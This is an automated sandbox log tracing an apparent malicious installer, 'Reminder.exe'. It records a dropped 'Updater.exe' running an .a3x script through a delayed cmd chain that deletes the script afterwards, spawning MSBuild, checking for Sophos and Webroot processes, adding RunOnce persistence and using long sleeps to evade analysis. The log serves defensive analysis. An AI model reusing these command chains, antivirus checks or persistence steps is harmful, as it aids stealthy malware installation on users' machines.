Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\ZPrVgH71.a3x && del C:\ProgramData\\ZPrVgH71.a3x
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\coigned\Updater.exe updater.exe C:\ProgramData\\ZPrVgH71.a3x
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\ZPrVgH71.a3x && del C:\ProgramData\\ZPrVgH71.a3x
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\coigned\Updater.exe updater.exe C:\ProgramData\\ZPrVgH71.a3x
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: explorerframe.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Section loaded: apphelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Window found: window name: TMainForm
Source: Reminder.exe Static file information: File size 10161880 > 1048576
Source: Reminder.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Reminder.exe Static PE information: real checksum: 0x9b2654 should be: 0x9bc79f
Source: Reminder.exe Static PE information: section name: .didata
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\Desktop\Reminder.exe File created: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\coigned\is-9F4FN.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fdeahdg
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fdeahdg
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fdeahdg
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fdeahdg
Source: C:\Users\user\Desktop\Reminder.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Reminder.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8CPJ0.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep count: 102 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -3060000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6512 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep count: 191 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -5730000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2924 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process information queried: ProcessInformation

Anti Debugging

barindex
Source: C:\Windows\System32\tasklist.exe System information queried: CodeIntegrityInformation
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
